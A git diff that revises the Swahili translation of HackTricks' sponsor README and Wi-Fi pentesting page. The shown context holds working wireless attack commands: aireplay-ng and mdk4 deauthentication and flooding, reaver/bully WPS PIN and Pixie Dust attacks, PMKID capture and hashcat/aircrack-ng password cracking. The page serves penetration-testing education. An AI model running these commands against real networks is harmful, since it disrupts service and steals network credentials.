diff --git a/README.md b/README.md index 583fbb61a..3168e0ab1 100644 --- a/README.md +++ b/README.md @@ -42,9 +42,9 @@ Unaweza kuangalia **blogu** yao katika [**https://blog.stmcyber.com**](https://b
-**Intigriti** ni **jukwaa la udukuzi wa kimaadili na bug bounty nambari moja barani Ulaya.** +**Intigriti** ni **jukwaa nambari moja** la udukuzi wa kimaadili na **bug bounty** barani **Ulaya**. -**Nasaha ya bug bounty**: **jiandikishe** kwa **Intigriti**, jukwaa la **bug bounty la premium lililotengenezwa na hackers, kwa hackers**! Jiunge nasi katika [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata zawadi hadi **$100,000**! +**Nasaha ya bug bounty**: **jiandikishe** kwa **Intigriti**, jukwaa la **bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers**! Jiunge nasi katika [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata zawadi hadi **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -65,7 +65,7 @@ Pata Ufikiaji Leo: ### [HACKENPROOF](https://bit.ly/3xrrDrL) -
+
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! @@ -83,7 +83,7 @@ Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) serve **Pata mtazamo wa hacker kuhusu programu zako za wavuti, mtandao, na wingu** -**Pata na ripoti za udhaifu muhimu, zinazoweza kutumika zikiwa na athari halisi za kibiashara.** Tumia zana zetu zaidi ya 20 za kawaida kupanga uso wa shambulio, pata masuala ya usalama yanayokuruhusu kupandisha mamlaka, na tumia mashambulizi ya kiotomatiki kukusanya ushahidi muhimu, ukigeuza kazi yako ngumu kuwa ripoti za kushawishi. +**Pata na ripoti za udhaifu muhimu, zinazoweza kutumika zenye athari halisi za kibiashara.** Tumia zana zetu zaidi ya 20 za kawaida kupanga uso wa shambulio, pata masuala ya usalama yanayokuruhusu kupandisha mamlaka, na tumia mashambulizi ya kiotomatiki kukusanya ushahidi muhimu, ukigeuza kazi yako ngumu kuwa ripoti za kuvutia. {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} @@ -93,7 +93,7 @@ Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) serve
-**SerpApi** inatoa APIs za wakati halisi kwa haraka na kwa urahisi ili **kupata matokeo ya injini za utafutaji**. Wanakusanya data kutoka kwa injini za utafutaji, kushughulikia proxies, kutatua captchas, na kuchambua data zote zenye muundo wa kina kwa ajili yako. +**SerpApi** inatoa APIs za haraka na rahisi za wakati halisi ili **kupata matokeo ya injini za utafutaji**. Wanakusanya data kutoka kwa injini za utafutaji, kushughulikia proxies, kutatua captchas, na kuchambua data zote zenye muundo wa kina kwa ajili yako. Usajili wa moja ya mipango ya SerpApi unajumuisha ufikiaji wa zaidi ya APIs 50 tofauti za kukusanya data kutoka kwa injini tofauti za utafutaji, ikiwa ni pamoja na Google, Bing, Baidu, Yahoo, Yandex, na zaidi.\ Tofauti na watoa huduma wengine, **SerpApi haisafishi tu matokeo ya asili**. Majibu ya SerpApi mara kwa mara yanajumuisha matangazo yote, picha na video za ndani, grafu za maarifa, na vipengele na sifa nyingine zilizopo katika matokeo ya utafutaji. @@ -108,7 +108,7 @@ Unaweza **kuunda akaunti ya bure** [**hapa**](https://serpapi.com/users/sign\_up
-[**WebSec**](https://websec.nl) ni kampuni ya kitaalamu ya usalama wa mtandao iliyo na makao yake nchini **Amsterdam** ambayo inasaidia **kulinda** biashara **duniani kote** dhidi ya vitisho vya hivi karibuni vya usalama wa mtandao kwa kutoa **huduma za usalama wa mashambulizi** kwa njia ya **kisasa**. +[**WebSec**](https://websec.nl) ni kampuni ya kitaalamu ya usalama wa mtandao iliyo na makao yake nchini **Amsterdam** ambayo inasaidia **kulinda** biashara **kote duniani** dhidi ya vitisho vya hivi karibuni vya usalama wa mtandao kwa kutoa **huduma za usalama wa mashambulizi** kwa njia ya **kisasa**. WebSec ni kampuni ya **usalama wa kila kitu** ambayo inamaanisha wanafanya kila kitu; Pentesting, **Ukaguzi wa** Usalama, Mafunzo ya Uelewa, Kampeni za Phishing, Mapitio ya Kanuni, Maendeleo ya Uthibitisho, Utaalamu wa Usalama wa Kukodisha na mengi zaidi. @@ -120,7 +120,7 @@ Mbali na hayo WebSec pia ni **mshabiki aliyejitolea wa HackTricks.** ## License & Disclaimer -Angalia katika: +Angalia kwenye: {% content-ref url="welcome/hacktricks-values-and-faq.md" %} [hacktricks-values-and-faq.md](welcome/hacktricks-values-and-faq.md) @@ -139,7 +139,7 @@ Jifunze na fanya mazoezi ya GCP Hacking: Support HackTricks * Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! -* **Jiunge na** πŸ’¬ [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Jiunge na** πŸ’¬ [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Shiriki hila za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md index 0dd21668d..c1b0aa1b3 100644 --- a/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -15,17 +15,17 @@ Jifunze na fanya mazoezi ya GCP Hacking: {% endhint %} -
+
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! -**Hacking Insights**\ +**Uelewa wa Hacking**\ Shiriki na maudhui yanayoangazia msisimko na changamoto za hacking -**Real-Time Hack News**\ -Baki na habari za hivi punde katika ulimwengu wa hacking kupitia habari na maarifa ya wakati halisi +**Habari za Hack kwa Wakati Halisi**\ +Baki na habari za hivi punde katika ulimwengu wa hacking kupitia habari na uelewa wa wakati halisi -**Latest Announcements**\ +**Matangazo ya Hivi Punde**\ Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa **Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! @@ -75,7 +75,7 @@ From: [https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux](https://g ### wifiphisher -Inaweza kufanya mashambulizi ya Evil Twin, KARMA, na Known Beacons kisha kutumia kiolezo cha phishing ili kupata nenosiri halisi la mtandao au kukamata akauti za mitandao ya kijamii. +Inaweza kufanya mashambulizi ya Evil Twin, KARMA, na Known Beacons kisha kutumia kigezo cha phishing ili kupata nenosiri halisi la mtandao au kukamata akauti za mitandao ya kijamii. ```bash git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision cd wifiphisher # Switch to tool's directory @@ -89,59 +89,59 @@ Chombo hiki kinara **WPS/WEP/WPA-PSK** mashambulizi. Kitafanya moja kwa moja: * Chunguza mitandao inayowezekana - Na kukuruhusu kuchagua mwathirika(wathirika) * Ikiwa ni WEP - Anzisha mashambulizi ya WEP * Ikiwa ni WPA-PSK -* Ikiwa ni WPS: Mashambulizi ya Pixie dust na mashambulizi ya bruteforce (kuwa makini mashambulizi ya brute-force yanaweza kuchukua muda mrefu). Kumbuka kwamba hakijaribu PIN za null au PIN zilizozalishwa/databasi. -* Jaribu kukamata PMKID kutoka AP ili kuifungua -* Jaribu kuondoa wateja wa AP ili kukamata mkono +* Ikiwa ni WPS: Mashambulizi ya Pixie dust na mashambulizi ya bruteforce (kuwa makini mashambulizi ya brute-force yanaweza kuchukua muda mrefu). Kumbuka kwamba hakijaribu PIN ya sifuri au PIN zilizotengenezwa/kutolewa. +* Jaribu kukamata PMKID kutoka AP ili kuikata +* Jaribu kuondoa uthibitisho wa wateja wa AP ili kukamata mkono * Ikiwa ni PMKID au Mkono, jaribu bruteforce kwa kutumia nywila 5000 bora. ## Muhtasari wa Mashambulizi * **DoS** -* Kuondoa/kuondoa ushirikiano -- Unganisha kila mtu (au ESSID/Mteja maalum) +* Kuondoa uthibitisho/kuondoa ushirikiano -- Unganisha kila mtu (au ESSID/Mteja maalum) * AP za uongo za nasibu -- Ficha mitandao, huenda ikasababisha skana kuanguka * Kuongeza mzigo AP -- Jaribu kuua AP (kawaida si ya manufaa sana) * WIDS -- Cheza na IDS * TKIP, EAPOL -- Mashambulizi maalum ya DoS kwa AP fulani -* **Kufungua** -* Fungua **WEP** (zana na mbinu kadhaa) +* **Kuvunja** +* Vunja **WEP** (zana na mbinu kadhaa) * **WPA-PSK** * **WPS** pin "Brute-Force" * **WPA PMKID** bruteforce -* \[DoS +] **WPA handshake** kukamata + Kufungua +* \[DoS +] **WPA handshake** kukamata + Kuvunja * **WPA-MGT** * **Kukamata Jina la Mtumiaji** * **Bruteforce** Akreditivu * **Evil Twin** (ikiwa na au bila DoS) -* **Open** Evil Twin \[+ DoS] -- Inatumika kukamata akreditivu za portal ya mateka na/au kufanya mashambulizi ya LAN -* **WPA-PSK** Evil Twin -- Inatumika kwa mashambulizi ya mtandao ikiwa unajua nywila -* **WPA-MGT** -- Inatumika kukamata akreditivu za kampuni +* **Open** Evil Twin \[+ DoS] -- Ya manufaa kukamata akreditivu za portal ya mateka na/au kufanya mashambulizi ya LAN +* **WPA-PSK** Evil Twin -- Ya manufaa kwa mashambulizi ya mtandao ikiwa unajua nywila +* **WPA-MGT** -- Ya manufaa kukamata akreditivu za kampuni * **KARMA, MANA**, **Loud MANA**, **Beacon inayojulikana** -* **+ Open** -- Inatumika kukamata akreditivu za portal ya mateka na/au kufanya mashambulizi ya LAN -* **+ WPA** -- Inatumika kukamata mikono ya WPA +* **+ Open** -- Ya manufaa kukamata akreditivu za portal ya mateka na/au kufanya mashambulizi ya LAN +* **+ WPA** -- Ya manufaa kukamata WPA handshakes ## DOS -### Pakiti za Kuondoa Ushirikiano +### Pakiti za Kuondoa Uthibitisho **Maelezo kutoka** [**hapa**:](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.** -Mashambulizi ya **kuondoa ushirikiano**, mbinu maarufu katika udukuzi wa Wi-Fi, yanahusisha kutunga "mifumo ya usimamizi" ili **kuondoa vifaa kwa nguvu kutoka mtandao**. Pakiti hizi zisizo na usimbuaji zinawadanganya wateja kuamini kwamba zinatoka kwenye mtandao halali, zikimwezesha washambuliaji kukusanya mikono ya WPA kwa ajili ya kufungua au kuendelea kuharibu muunganisho wa mtandao. Mbinu hii, inayoshangaza kwa urahisi wake, inatumika sana na ina athari kubwa kwa usalama wa mtandao. +Mashambulizi ya **Kuondoa Uthibitisho**, mbinu maarufu katika udukuzi wa Wi-Fi, yanahusisha kutunga "meneja" fremu ili **kuondoa vifaa kwa nguvu kutoka mtandao**. Pakiti hizi zisizo na usimbuaji zinawadanganya wateja kuamini kwamba zinatoka kwenye mtandao halali, zikimwezesha washambuliaji kukusanya WPA handshakes kwa ajili ya kuvunja au kuendelea kuharibu muunganisho wa mtandao. Mbinu hii, inayoshangaza kwa urahisi wake, inatumika sana na ina athari kubwa kwa usalama wa mtandao. -**Kuondoa ushirikiano kwa kutumia Aireplay-ng** +**Kuondoa Uthibitisho kwa kutumia Aireplay-ng** ``` aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 ``` * \-0 inamaanisha deauthentication * 1 ni idadi ya deauths za kutuma (unaweza kutuma nyingi ikiwa unataka); 0 inamaanisha zitumwe kwa kuendelea -* \-a 00:14:6C:7E:40:80 ni anwani ya MAC ya kituo cha ufikiaji -* \-c 00:0F:B5:34:30:30 ni anwani ya MAC ya mteja wa kuondoa uthibitisho; ikiwa hii imeachwa, basi deauthentication ya matangazo inatumwa (sio kila wakati inafanya kazi) -* ath0 ni jina la kiunganishi +* \-a 00:14:6C:7E:40:80 ni anwani ya MAC ya access point +* \-c 00:0F:B5:34:30:30 ni anwani ya MAC ya mteja wa deauthenticate; ikiwa hii imeachwa, basi deauthentication ya matangazo inatumwa (sio kila wakati inafanya kazi) +* ath0 ni jina la interface ### Disassociation Packets -**Disassociation packets**, sawa na deauthentication packets, ni aina ya fremu ya usimamizi inayotumika katika mitandao ya Wi-Fi. Pakiti hizi hutumikia kukatisha uhusiano kati ya kifaa (kama vile kompyuta mpakato au simu ya mkononi) na kituo cha ufikiaji (AP). Tofauti kuu kati ya disassociation na deauthentication iko katika hali zao za matumizi. Wakati AP inatoa **deauthentication packets kuondoa vifaa vya uasi moja kwa moja kutoka kwenye mtandao, disassociation packets kwa kawaida hutumwa wakati AP inafanya kufunga, kuanzisha upya, au kuhamasisha, hivyo kuhitaji kukatishwa kwa uhusiano wa nodi zote zilizounganishwa.** +**Disassociation packets**, kama vile deauthentication packets, ni aina ya frame ya usimamizi inayotumika katika mitandao ya Wi-Fi. Pakiti hizi hutumikia kukatisha uhusiano kati ya kifaa (kama vile laptop au smartphone) na access point (AP). Tofauti kuu kati ya disassociation na deauthentication iko katika hali zao za matumizi. Wakati AP inatoa **deauthentication packets kuondoa vifaa vya uasi wazi kutoka kwenye mtandao, disassociation packets kwa kawaida hutumwa wakati AP inafanya kufunga, kuanzisha upya, au kuhamasisha, hivyo kuhitaji kukatishwa kwa uhusiano wa nodi zote zilizounganishwa.** -**Shambulio hili linaweza kufanywa na mdk4(mode "d"):** +**Huu shambulio unaweza kufanywa na mdk4(mode "d"):** ```bash # -c # -b victim_client_mac.txt contains the MAC address of the device to eliminate @@ -150,13 +150,13 @@ aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 # Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F ``` -### **More DOS attacks by mdk4** +### **Zaidi ya mashambulizi ya DOS na mdk4** -**In** [**here**](https://en.kali.tools/?p=864)**.** +**Katika** [**hapa**](https://en.kali.tools/?p=864)**.** -**ATTACK MODE b: Beacon Flooding** +**MODE YA SHAMBULIO b: Beacon Flooding** -Inatuma fremu za beacon kuonyesha AP za uwongo kwa wateja. Hii inaweza wakati mwingine kusababisha skana za mtandao na hata madereva kuanguka! +Inatuma beacon frames kuonyesha APs za uwongo kwa wateja. Hii inaweza wakati mwingine kusababisha skana za mtandao na hata madereva kuanguka! ```bash # -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit # -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES) @@ -166,7 +166,7 @@ mdk4 wlan0mon b -a -w nta -m ``` **ATTACK MODE a: Authentication Denial-Of-Service** -Kutuma fremu za uthibitisho kwa Wasiliani wote wanaopatikana (APs) ndani ya eneo la ushawishi kunaweza kupelekea APs hizi kujaa, hasa wakati wateja wengi wanahusika. Hii trafiki kali inaweza kusababisha kutokuwa na utulivu kwa mfumo, na kusababisha baadhi ya APs kufungia au hata kurekebisha. +Kutuma fremu za uthibitisho kwa Wasiliani wote wanaopatikana (APs) ndani ya eneo la kufikia kunaweza kupelekea APs hizi kujaa, hasa wakati wateja wengi wanahusika. Hii trafiki kali inaweza kusababisha kutokuwa na utulivu kwa mfumo, na kusababisha baadhi ya APs kufungia au hata kurekebisha. ```bash # -a BSSID send random data from random clients to try the DoS # -i BSSID capture and repeat pakets from authenticated clients @@ -180,7 +180,7 @@ Kuchunguza N Ρ‚ΠΎΡ‡ΠΊΠΈ za Upatikanaji (APs) kunakagua ikiwa SSID imefunuliwa ip **ATTACK MODE m: Michael Countermeasures Exploitation** -Kutuma pakiti za nasibu au za nakala kwa foleni tofauti za QoS kunaweza kuanzisha Michael Countermeasures kwenye **TKIP APs**, na kusababisha kuzima kwa AP kwa dakika moja. Njia hii ni mbinu yenye ufanisi ya **DoS** (Denial of Service) shambulio. +Kutuma pakiti za nasibu au za nakala kwa foleni tofauti za QoS kunaweza kuanzisha Michael Countermeasures kwenye **TKIP APs**, na kusababisha kuzima kwa AP kwa dakika moja. Mbinu hii ni mbinu bora ya **DoS** (Denial of Service) ya shambulio. ```bash # -t of a TKIP AP # -j use inteligent replay to create the DoS @@ -188,7 +188,7 @@ mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j] ``` **ATTACK MODE e: EAPOL Start and Logoff Packet Injection** -Kufurika AP kwa **EAPOL Start frames** kunaunda **vikao vya uwongo**, kujaa AP na kuzuia wateja halali. Vinginevyo, kuingiza **ujumbe wa uwongo wa EAPOL Logoff** kunalazimisha kuunganishwa kwa wateja, mbinu zote mbili zinaharibu huduma ya mtandao. +Kufurika AP kwa **EAPOL Start frames** kunaunda **sessions za uongo**, ikizidi nguvu AP na kuzuia wateja halali. Vinginevyo, kuingiza **ujumbe wa uongo wa EAPOL Logoff** kunalazimisha kuunganishwa kwa wateja, mbinu zote mbili zinaharibu huduma ya mtandao. ```bash # Use Logoff messages to kick clients mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l] @@ -199,7 +199,7 @@ Mashambulizi mbalimbali kwenye usimamizi wa kiungo na urambazaji katika mitandao **ATTACK MODE w: WIDS Kichanganyiko** -Kuunganisha wateja kwa nodi nyingi za WDS au APs za uongo kunaweza kudhibiti Mifumo ya Kugundua na Kuzuia Uvamizi, kuunda mkanganyiko na matumizi mabaya ya mfumo yanayoweza kutokea. +Kuhusisha wateja kwa nodi nyingi za WDS au APs bandia za uasi kunaweza kudhibiti Mifumo ya Kugundua na Kuzuia Uvamizi, kuunda mkanganyiko na matumizi mabaya ya mfumo yanayoweza kutokea. ```bash # -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts) mkd4 -e -c [-z] @@ -237,24 +237,24 @@ bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3 Hii mbinu iliyosafishwa inalenga WPS PINs kwa kutumia udhaifu unaojulikana: 1. **PINs zilizogunduliwa awali**: Tumia hifadhidata ya PINs zinazojulikana zinazohusishwa na watengenezaji maalum wanaojulikana kutumia WPS PINs sawa. Hifadhidata hii inahusisha octets tatu za kwanza za anwani za MAC na PINs zinazoweza kuwa za watengenezaji hawa. -2. **Mifumo ya Kutengeneza PIN**: Tumia mifumo kama ComputePIN na EasyBox, ambayo inakadiria WPS PINs kulingana na anwani ya MAC ya AP. Mifumo ya Arcadyan inahitaji pia kitambulisho cha kifaa, ikiongeza safu kwenye mchakato wa kutengeneza PIN. +2. **Mifumo ya Kutengeneza PIN**: Tumia mifumo kama ComputePIN na EasyBox, ambayo inakadiria WPS PINs kulingana na anwani ya MAC ya AP. Mifumo ya Arcadyan pia inahitaji kitambulisho cha kifaa, ikiongeza safu kwenye mchakato wa kutengeneza PIN. ### WPS Pixie Dust attack -**Dominique Bongard** aligundua kasoro katika baadhi ya Access Points (APs) kuhusiana na uundaji wa misimbo ya siri, inayojulikana kama **nonces** (**E-S1** na **E-S2**). Ikiwa nonces hizi zinaweza kugundulika, kuvunja WPS PIN ya AP inakuwa rahisi. AP inafichua PIN ndani ya msimbo maalum (hash) kuthibitisha kuwa ni halali na sio AP bandia (rogue). Nonces hizi kimsingi ni "funguo" za kufungua "sefu" inayoshikilia WPS PIN. Zaidi kuhusu hili inaweza kupatikana [hapa](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\)). +**Dominique Bongard** aligundua kasoro katika baadhi ya Access Points (APs) kuhusu uundaji wa misimbo ya siri, inayojulikana kama **nonces** (**E-S1** na **E-S2**). Ikiwa nonces hizi zinaweza kugundulika, kuvunja WPS PIN ya AP inakuwa rahisi. AP inafichua PIN ndani ya msimbo maalum (hash) kuthibitisha kuwa ni halali na sio AP bandia (rogue). Nonces hizi kimsingi ni "funguo" za kufungua "sefu" inayoshikilia WPS PIN. Zaidi kuhusu hili inaweza kupatikana [hapa](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\)). -Kwa maneno rahisi, tatizo ni kwamba baadhi ya APs hazikutumia funguo za kutosha za nasibu kwa ajili ya kuficha PIN wakati wa mchakato wa kuungana. Hii inafanya PIN kuwa hatarini kubashiriwa kutoka nje ya mtandao (offline brute force attack). +Kwa maneno rahisi, tatizo ni kwamba baadhi ya APs hazikutumia funguo za kutosha za nasibu kwa ajili ya kuficha PIN wakati wa mchakato wa kuungana. Hii inafanya PIN kuwa hatarini kuweza kukisiwa kutoka nje ya mtandao (offline brute force attack). ```bash reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3 ``` -Ikiwa hutaki kubadilisha kifaa kuwa hali ya ufuatiliaji, au `reaver` na `bully` zina tatizo fulani, unaweza kujaribu [OneShot-C](https://github.com/nikita-yfh/OneShot-C). Zana hizi zinaweza kufanya shambulio la Pixie Dust bila ya kuhitaji kubadilisha kuwa hali ya ufuatiliaji. +Ikiwa hutaki kubadilisha kifaa kuwa katika hali ya ufuatiliaji, au `reaver` na `bully` zina tatizo fulani, unaweza kujaribu [OneShot-C](https://github.com/nikita-yfh/OneShot-C). Zana hizi zinaweza kufanya shambulio la Pixie Dust bila ya kuhitaji kubadilisha kuwa katika hali ya ufuatiliaji. ```bash ./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37 ``` ### Null Pin attack -Baadhi ya mifumo iliyoundwa vibaya hata inaruhusu **Null PIN** (PIN tupu au isiyokuwepo) kutoa ufikiaji, ambayo ni ya kawaida sana. Chombo **Reaver** kina uwezo wa kujaribu udhaifu huu, tofauti na **Bully**. +Baadhi ya mifumo iliyoundwa vibaya hata inaruhusu **Null PIN** (PIN tupu au isiyokuwepo) kutoa ufikiaji, jambo ambalo si la kawaida. Chombo **Reaver** kina uwezo wa kujaribu udhaifu huu, tofauti na **Bully**. ```bash reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p '' ``` @@ -278,7 +278,7 @@ Sasa imevunjika na haitumiki siku hizi. Jua tu kwamba _**airgeddon**_ ina chaguo *** -
+
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa makosa! @@ -286,7 +286,7 @@ Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) serve Shiriki na maudhui yanayochunguza msisimko na changamoto za hacking **Real-Time Hack News**\ -Baki na habari za hivi punde katika ulimwengu wa hacking kupitia habari na maarifa ya wakati halisi +Baki na habari za kisasa kuhusu ulimwengu wa hacking kupitia habari na maarifa ya wakati halisi **Latest Announcements**\ Baki na taarifa kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa @@ -299,7 +299,7 @@ Baki na taarifa kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa ### PMKID -Mnamo mwaka wa 2018, **hashcat** [ilifunua](https://hashcat.net/forum/thread-7717.html) njia mpya ya shambulio, ya kipekee kwa sababu inahitaji **pakiti moja tu** na haitaji wateja wowote kuungana na AP lengwaβ€”ni mwingiliano tu kati ya mshambuliaji na AP. +Mnamo mwaka wa 2018, **hashcat** [ilifunua](https://hashcat.net/forum/thread-7717.html) njia mpya ya shambulio, ya kipekee kwa sababu inahitaji tu **pakiti moja** na haitaji wateja wowote kuunganishwa na AP lengwaβ€”ni mwingiliano tu kati ya mshambuliaji na AP. Router nyingi za kisasa zinaongeza **sehemu ya hiari** kwenye **frame ya kwanza ya EAPOL** wakati wa ushirikiano, inayojulikana kama `Robust Security Network`. Hii inajumuisha `PMKID`. @@ -307,7 +307,7 @@ Kama ilivyoelezwa katika chapisho la awali, **PMKID** inaundwa kwa kutumia data ```bash PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA) ``` -Kutoa kuwa "PMK Name" ni thabiti, tunajua BSSID ya AP na kituo, na `PMK` ni sawa na ile kutoka kwa handshake kamili ya njia 4, **hashcat** inaweza kutumia habari hii kuvunja PSK na kurejesha neno la siri! +Kuzingatia kuwa "Jina la PMK" ni thabiti, tunajua BSSID ya AP na kituo, na `PMK` ni sawa na ile kutoka kwa handshake kamili ya njia 4, **hashcat** inaweza kutumia habari hii kuvunja PSK na kurejesha neno la siri! Ili **kusanya** habari hii na **bruteforce** kwa ndani nenosiri unaweza kufanya: ```bash @@ -322,15 +322,15 @@ hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1 ./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1 ``` The **PMKIDs captured** zitakuwa zinaonyeshwa kwenye **console** na pia **zitaokolewa** ndani ya \_ **/tmp/attack.pcap**\_\ -Sasa, badilisha kukamata kuwa **hashcat/john** format na uifanye iweze kuvunjwa: +Sasa, badilisha kukamata kuwa **hashcat/john** format na uifanye iweze kufichuliwa: ```bash hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt ``` -Tafadhali kumbuka muundo wa hash sahihi una sehemu **4**, kama: `4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838` Ikiwa yako ina sehemu **3** tu, basi, ni **batili** (kukamata PMKID hakukuwa sahihi). +Tafadhali kumbuka muundo wa hash sahihi una sehemu **4**, kama: `4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838` Ikiwa yako ina sehemu **3** tu, basi, ni **batili** (kuchukuliwa kwa PMKID hakukuwa sahihi). -Kumbuka kwamba `hcxdumptool` **pia hukamata mikono** (kitu kama hiki kitaonekana: **`MP:M1M2 RC:63258 EAPOLTIME:17091`**). Unaweza **kubadilisha** mikono hiyo kuwa muundo wa **hashcat**/**john** kwa kutumia `cap2hccapx` +Kumbuka kwamba `hcxdumptool` **pia inachukua mikono** (kitu kama hiki kitaonekana: **`MP:M1M2 RC:63258 EAPOLTIME:17091`**). Unaweza **kubadilisha** mikono hiyo kuwa muundo wa **hashcat**/**john** kwa kutumia `cap2hccapx` ```bash tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"] @@ -338,7 +338,7 @@ hccap2john pmkid.hccapx > handshake.john john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes ``` -_Imeonekana kwamba baadhi ya mikono iliyoshikwa kwa zana hii haiwezi kufichuliwa hata ikijulikana nenosiri sahihi. Napendekeza kukamata mikono pia kwa njia ya jadi ikiwa inawezekana, au kukamata kadhaa kwa kutumia zana hii._ +_Imebaini kwamba baadhi ya mikono iliyokamatwa kwa kutumia chombo hiki haiwezi kufichuliwa hata ikijulikana nenosiri sahihi. Napendekeza kukamata mikono pia kwa njia ya jadi ikiwa inawezekana, au kukamata kadhaa kwa kutumia chombo hiki._ ### Handshake capture @@ -349,21 +349,21 @@ Shambulio kwenye mitandao ya **WPA/WPA2** linaweza kutekelezwa kwa kukamata **ha ```bash airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap ``` -3. Ili kuongeza nafasi ya kukamata handshake, katisha mteja kutoka kwenye mtandao kwa muda ili kulazimisha re-authentication. Hii inaweza kufanywa kwa kutumia amri ya `aireplay-ng`, ambayo inatuma pakiti za deauthentication kwa mteja: +3. Kuongeza nafasi ya kukamata handshake, katisha mteja kwa muda kutoka kwenye mtandao ili kulazimisha re-authentication. Hii inaweza kufanywa kwa kutumia amri ya `aireplay-ng`, ambayo inatuma pakiti za deauthentication kwa mteja: ```bash aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios ``` -_Nakumbuka kwamba wakati mteja alikosewa uthibitisho, unaweza kujaribu kuungana na AP tofauti au, katika hali nyingine, na mtandao tofauti._ +_Nakili kwamba wakati mteja alikosewa uthibitisho, unaweza kujaribu kuungana na AP tofauti au, katika hali nyingine, na mtandao tofauti._ -Mara `airodump-ng` inapokuwa na taarifa za handshake, hii inamaanisha kwamba handshake ilikamatwa na unaweza kusitisha kusikiliza: +Mara tu katika `airodump-ng` inapoonekana taarifa za handshake, hii inamaanisha kwamba handshake ilikamatwa na unaweza kusitisha kusikiliza: ![](<../../.gitbook/assets/image (172) (1).png>) -Mara handshake ikikamatwa, unaweza **crack** nayo kwa kutumia `aircrack-ng`: +Mara handshake inakamatwa unaweza **crack** nayo kwa `aircrack-ng`: ``` aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap ``` -### Angalia kama handshake iko kwenye faili +### Angalia ikiwa handshake iko kwenye faili **aircrack** ```bash @@ -386,7 +386,7 @@ pyrit -r psk-01.cap analyze ``` ## **WPA Enterprise (MGT)** -Katika **mipangilio ya WiFi ya biashara, utapata mbinu mbalimbali za uthibitishaji**, kila moja ikitoa viwango tofauti vya 